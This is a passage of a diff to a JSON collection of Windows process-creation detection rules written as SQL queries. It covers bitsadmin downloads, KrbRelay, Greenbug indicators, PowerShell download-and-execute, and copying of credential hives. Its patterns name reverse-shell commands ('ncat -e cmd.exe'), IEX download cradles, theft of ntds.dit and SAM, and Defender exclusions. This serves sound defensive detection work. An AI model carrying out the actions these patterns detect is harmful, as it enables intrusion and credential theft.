ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_encode.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "File Download Via Bitsadmin To An Uncommon Target Folder", - "id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - 
"description": "Detects usage of bitsadmin downloading a file to uncommon target folder", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "HackTool - KrbRelay Execution", - "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", - "status": "experimental", - "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "title": "HackTool - SecurityXploded Execution", + "id": 
"7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1558.003" + "attack.t1555" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_krbrelay.yml" + "filename": "proc_creation_win_hktl_secutyxploded.yml" }, { - "title": "Copying Sensitive Files with Credential Data", - "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", - "status": "test", - "description": "Files with well-known filenames (sensitive files with credential data) copying", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their 
malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003", - "car.2013-07-001", - "attack.s0404" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary 
Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "Greenbug Espionage Group Indicators", - "id": "3711eee4-a808-4849-8a14-faf733da3612", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec", - "author": "Florian Roth (Nextron Systems)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service 
configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.g0049", - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1105", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%:\\\\ProgramData\\\\adobe\\\\Adobe.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\oracle\\\\local.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\revshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\infopagesbackup\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\ProgramData\\\\comms\\\\comms.exe' ESCAPE '\\') OR (CommandLine LIKE '%-ExecutionPolicy Bypass -File%' ESCAPE '\\' AND CommandLine LIKE '%\\\\msf.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%infopagesbackup%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ncat%' ESCAPE '\\' AND CommandLine LIKE '%-e cmd.exe%' ESCAPE '\\') OR (CommandLine LIKE '%system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill%' ESCAPE '\\' OR CommandLine LIKE '%-nop -w hidden -c $k=new-object%' ESCAPE '\\' OR CommandLine LIKE '%[Net.CredentialCache]::DefaultCredentials;IEX %' ESCAPE '\\' OR CommandLine LIKE '% -nop -w hidden -c $m=new-object net.webclient;$m%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass whoami%' ESCAPE '\\' OR CommandLine LIKE '%-noninteractive -executionpolicy bypass netstat -a%' ESCAPE '\\') OR CommandLine LIKE '%L3NlcnZlcj1%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE 
'\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_greenbug_may20.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Shells Spawned by Java", - "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", + "author": "frack113", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE 
'%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.resource_development", + "attack.t1587.001", "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. 
Filter them in your environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", - "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", + "status": "test", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Legitimate activity is expected since compressing files with a password is common." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' 
ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "status": "experimental", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. 
Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", - "author": "frack113", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine 
